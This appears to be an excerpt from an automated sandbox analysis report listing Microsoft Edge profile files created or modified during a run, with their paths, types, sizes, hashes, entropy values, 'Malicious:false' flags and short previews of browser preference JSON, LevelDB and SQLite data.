                                                                                                                                                                                                                                                                                SHA-256:06509A7E418D9CCE502E897EAEEE8C6E3DCB1D0622B421DD968AF3916A5BFF90
                                                                                                                                                                                                                                                                                SHA-512:ADC193A89F0E476E7326B4EA0472814FE6DD0C16FC010AAF7B4CF78567D5DF6A1574C1CE99A63018AFE7E9AD68918147880621A3C00FAA7AD1014A0056B4B9C4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\09c4c63b-c955-4c9a-a9d1-a28fc1bf2049.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                Size (bytes):14705
                                                                                                                                                                                                                                                                                Entropy (8bit):5.258231223148646
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVrJ9pQTryZiuaba4uypPJ/Kw4rNaI0lY7gN128Kpj+FbFr1Qw/3Yoz1f:sVrLAJu4PJ/KiIjfpU/Qwg8
                                                                                                                                                                                                                                                                                MD5:6D0A8D1DCB905E59F07A35F7637CFCF6
                                                                                                                                                                                                                                                                                SHA1:F5D7D38D14D7AC120E861E23F193FD4FBE92B349
                                                                                                                                                                                                                                                                                SHA-256:2A9AE179F5CCA33A25DB8822EAB11F84FECCEF434025D15BC87BFEAC37DB9CA5
                                                                                                                                                                                                                                                                                SHA-512:49BD0002DFF3A2F7D41B0A22D21D261CD6A9DAA7DFBD602535CF3E63DA64C80DFE981A66ED056459BBF6535E2B919F95A9ECAF2E5B44B986DCBED4555D97544C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\32e11c12-43bf-425a-98ed-eb20853add0d.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9675
                                                                                                                                                                                                                                                                                Entropy (8bit):4.95959181108295
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVfkdpPJ5KaY4bh+8Kpj+FbFr1QA3woz1f:sVfQPJ5KKYpU/Q58
                                                                                                                                                                                                                                                                                MD5:7CEA3ACECCE69184AF93907BAB9D5C0F
                                                                                                                                                                                                                                                                                SHA1:A373CA2527E7C8EB77F4E02AA088060D8063E886
                                                                                                                                                                                                                                                                                SHA-256:9D53B50AD43B91B3B0B6AB2B2A17E0DD7FBE51E12129F269BE1F2685AF7DEE24
                                                                                                                                                                                                                                                                                SHA-512:AA8C4369D41FC3BC31CAAB0B96B4A873B07A6A0C94D9F020AAFB85430263489D9399A396B19702C39D0DDFB4773C59C014A91589A0157A04A1E748C0DED2BC44
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\804261d4-ae71-412c-a217-ffc2d20a2032.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):14489
                                                                                                                                                                                                                                                                                Entropy (8bit):5.261754432160573
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVrJ9pQTryZiuaba4uypPJ5Kw4rNaI0lY7gN128Kpj+FbFr1Qw/3woz1f:sVrLAJu4PJ5KiIjfpU/QwI8
                                                                                                                                                                                                                                                                                MD5:13ED98CD8CDA1B1940D91205E14A431F
                                                                                                                                                                                                                                                                                SHA1:BAED4E2C2E551E1C88B0653F3FCC7F1B0C5E6B3D
                                                                                                                                                                                                                                                                                SHA-256:C8ACE15717767977B0FF775A99B6631890AB67617D54993BB9A28B1FCFE459CE
                                                                                                                                                                                                                                                                                SHA-512:985584BAB17288852D885B9C129531C954E1F5E90FC4C1379BFDB9B2218C3ED8B0C8153C97C43D61D740DEB164A2C47C7EC6515ED15006B048ECA8B07FCFCF75
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\864f6152-6c88-4f44-8a89-62f7e51da9db.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):39694
                                                                                                                                                                                                                                                                                Entropy (8bit):5.562384360958255
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:823Lkx7pLGLx06WPUGfhT8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZxBaDKbrwy1W1Z:823Lkncx06WPUGfhTu1ja8xBiKwy1WYM
                                                                                                                                                                                                                                                                                MD5:4045FFB23328E2E5A3904DBDB55E9BB9
                                                                                                                                                                                                                                                                                SHA1:9E1F7EDF433A8D7F34A14496435F57DC17ACDE7F
                                                                                                                                                                                                                                                                                SHA-256:353AE1E6BE2B37D02EB04FE3A166EFA9774D7E39916E2F4EED70F9BB5B1EA028
                                                                                                                                                                                                                                                                                SHA-512:E20BDA3FF77F16904A26901B51EB7A89DE3F6CBF62FABEC6AF5920F8FEEBBA3CA61BBDEFF9F4CB800A7EC5B07D9C79BE919BBECC811739EBF79A6B8862369E82
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385951548871166","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385951548871166","location":5,"ma

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000001.dbtmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                Size (bytes):1695826
                                                                                                                                                                                                                                                                                Entropy (8bit):5.041139212250241
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:zPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:zPfZ/mS5
                                                                                                                                                                                                                                                                                MD5:44840D7922448F9F1F35774741A6C5CE
                                                                                                                                                                                                                                                                                SHA1:CAFACD5729B42306FCC840A579DDDDD310EAC721
                                                                                                                                                                                                                                                                                SHA-256:C056A766518F6E65446758FFFF8F77159E5C4D58B29DED13F196DE155016C203
                                                                                                                                                                                                                                                                                SHA-512:46162658F381E59EBE5A2DF93570431322A26A36762CE553FF964300D8469D23D74DEFA14816C8505E9ECF0505D6DD63B306C5D8796717A7D73E8321E640C7D2
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1G....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13385951559034018.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}]'B...................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13385951559034616.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):293
                                                                                                                                                                                                                                                                                Entropy (8bit):5.1289284991640525
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWjAM1wkn23oH+Tcwt9Eh1ZB2KLlNW1QXWq2Pwkn23oH+Tcwt9Eh1tIFUv:7PrfYeb9Eh1ZFLMZvYfYeb9Eh16FUv
                                                                                                                                                                                                                                                                                MD5:366AF77E12B1EC4FF0371652754887EE
                                                                                                                                                                                                                                                                                SHA1:197EDB7F2AFC01D572B5E3ACE118F237BBBD2919
                                                                                                                                                                                                                                                                                SHA-256:B191D6A3D3B21FC3A1EDA089687798FE0CABAA93D83637D5FB8BBD076B4373EB
                                                                                                                                                                                                                                                                                SHA-512:32B23436A554C51781CE1C23FE992513FFBE9328C26A35D892C4C38D364569D735C8EABEE5FF2040E8D4B93356CAE7A38AEE98EB125E69ABD3A813B87D0FEE8F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:35.347 2064 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2025/03/08-18:52:35.432 2064 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                                                                                                Entropy (8bit):0.3202460253800455
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                                                                                                                                MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                                                                                                                                SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                                                                                                                                SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                                                                                                                                SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                Entropy (8bit):0.4616620944574484
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuN4:TouQq3qh7z3bY2LNW9WMcUvBuq
                                                                                                                                                                                                                                                                                MD5:628FA2A87E94DCDBA4BFA3D543EB587B
                                                                                                                                                                                                                                                                                SHA1:DBCD1C7458C2C36795AA28CBD289F782552AAE52
                                                                                                                                                                                                                                                                                SHA-256:DA94D2044B834C8EDA789D19D97581FC5A011DD2ED6A201710BE24E7D8538BAE
                                                                                                                                                                                                                                                                                SHA-512:916CFC06191A50C606902FC969C4FF8C1DF98807009D3ECCD0A8B2F397F8FC5038894A3C49BECB2D2B9DC777AC4DBB87D0C9FB7875B218BA202A3ED24A28F707
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                                                                                Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:LsNlr:Ls3r
                                                                                                                                                                                                                                                                                MD5:B49AC7C31BC59AAC42A44490669C5A88
                                                                                                                                                                                                                                                                                SHA1:4A6F17B10431BF7B7BA0FBBF2D198D8FB79E84D6
                                                                                                                                                                                                                                                                                SHA-256:C0AAB8E74D52482031A011618DEB06D6FF440FF77DDCDC5F6AAE2EF063EA00C6
                                                                                                                                                                                                                                                                                SHA-512:12E8D2B9D31BC1016189CF74557B7259A2D83F725B2B513DBDDB48F4441E9D1623E375C31BE3A12DA2652BA48096BF7A77845564CF217F1C9562D5406B12A691
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:............................................s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

